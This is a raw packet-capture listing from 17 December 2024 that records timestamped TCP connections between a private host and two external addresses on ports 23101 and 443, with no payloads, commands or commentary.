                                                        Dec 17, 2024 14:31:04.511290073 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:04.631324053 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.923504114 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.961987019 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:04.963093996 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:05.082108021 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082120895 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082138062 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082145929 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082216024 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082223892 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082283020 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082292080 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082329035 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082427025 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082434893 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082549095 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082556963 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082560062 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083154917 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083163977 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083264112 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083271980 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083360910 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083569050 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083576918 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.527578115 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:05.647386074 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:06.543275118 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:06.863571882 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:07.558754921 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:07.679094076 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.379667044 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.421876907 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.422920942 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.541908026 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.541969061 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542026043 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542120934 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542155027 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542258978 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542293072 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542449951 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542493105 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542525053 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542573929 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542709112 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542737961 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542768955 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542939901 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543026924 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543054104 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543231010 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543258905 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543308973 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543353081 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.571675062 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.573874950 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.627450943 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.628464937 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.664243937 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.665337086 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.694024086 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.747642994 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.747742891 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.747901917 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748020887 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748167038 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748428106 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748478889 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748749018 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748946905 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.749061108 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785612106 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785664082 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785751104 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785764933 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785895109 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785908937 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785912991 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.786397934 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.786410093 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.786549091 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.786708117 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.987164021 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.043407917 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:09.043895960 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:09.163526058 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163570881 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163587093 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163649082 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163675070 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163789988 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163840055 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163957119 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163969994 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.164006948 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.205996037 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.589485884 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:09.709777117 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.011986017 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.057853937 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:10.072933912 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:10.074042082 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:10.193291903 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193310022 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193319082 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193329096 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193337917 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193358898 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193522930 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193533897 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193543911 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193588972 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193624973 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193655968 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193977118 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193985939 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.194093943 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.194103003 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.194111109 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.194119930 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.194339037 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.194349051 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.194365978 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.604990005 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:10.725167990 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.877713919 CET231014979545.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.878813982 CET4979523101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:10.998893023 CET231014979545.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.030878067 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.074743032 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:11.075527906 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:11.196357012 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196403980 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196413994 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196424961 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196515083 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196526051 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196634054 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196695089 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196897030 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.196991920 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197000980 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197010994 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197098017 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197107077 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197117090 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197154045 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197165966 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197292089 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197329998 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197339058 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.197359085 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:11.622657061 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:11.742577076 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.458913088 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.459031105 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.459089041 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:12.508238077 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:12.509140968 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:12.629118919 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629153013 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629160881 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629170895 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629259109 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629270077 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629333019 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629340887 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629424095 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629432917 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629591942 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629601002 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629703999 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629712105 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629751921 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629808903 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629817009 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629861116 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629868984 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.629945993 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.630146027 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:12.636298895 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:12.756056070 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.394054890 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:13.394108057 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:13.394397020 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:13.397692919 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:13.397711992 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:13.652112961 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:13.655252934 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.703171015 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:13.703844070 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:13.772115946 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.823807001 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.823838949 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.823865891 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.823977947 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824003935 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824105978 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824132919 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824208021 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824255943 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824378967 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824405909 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824431896 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824456930 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824600935 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824628115 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824655056 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824681044 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824728966 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824754953 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824780941 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:13.824809074 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.064018011 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.098380089 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:14.099206924 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:14.317584991 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317625046 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317671061 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317698002 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317725897 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317751884 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317780018 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317806959 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317832947 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317859888 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317886114 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317913055 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317939043 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317965031 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.317991972 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.318017960 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.318044901 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.318070889 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.318098068 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.318125010 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.318151951 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:14.610941887 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:14.611164093 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:14.612449884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:14.612482071 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:14.612903118 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:14.613902092 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:14.655376911 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:14.667494059 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:14.787436008 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.065279007 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.065355062 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.065437078 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.065434933 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.065522909 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.065606117 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.073704004 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.079555035 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.082169056 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.082226038 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.082243919 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.082277060 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.082343102 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.090646029 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.118495941 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:15.119462013 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:15.135971069 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.136034966 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.182832003 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.184969902 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.230061054 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.230089903 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.238682032 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.238748074 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.238853931 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.238907099 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239072084 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239099979 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239182949 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239242077 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239343882 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239393950 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239461899 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239658117 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239685059 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239835978 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239862919 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239890099 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239917040 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239943027 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.239969015 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.240034103 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.240060091 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.257488966 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.257558107 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.257576942 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.270087004 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.270149946 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.270169020 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.273334026 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.273401976 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.273417950 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.281831980 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.281896114 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.281912088 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.298479080 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.298556089 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.298569918 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.298598051 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.298650026 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.306943893 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.315397978 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.315466881 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.315485001 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.323736906 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.323798895 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.323817015 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.330265045 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.330323935 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.330341101 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.336451054 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.336519003 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.336534977 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.342767000 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.342845917 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.342863083 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.349661112 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.349860907 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.349889040 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.401560068 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.401603937 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.448448896 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.449834108 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.451939106 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.452011108 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.452030897 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.461863995 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.461884022 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.461941957 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.461960077 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.461992979 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.470875978 CET44349880104.21.84.67192.168.2.6
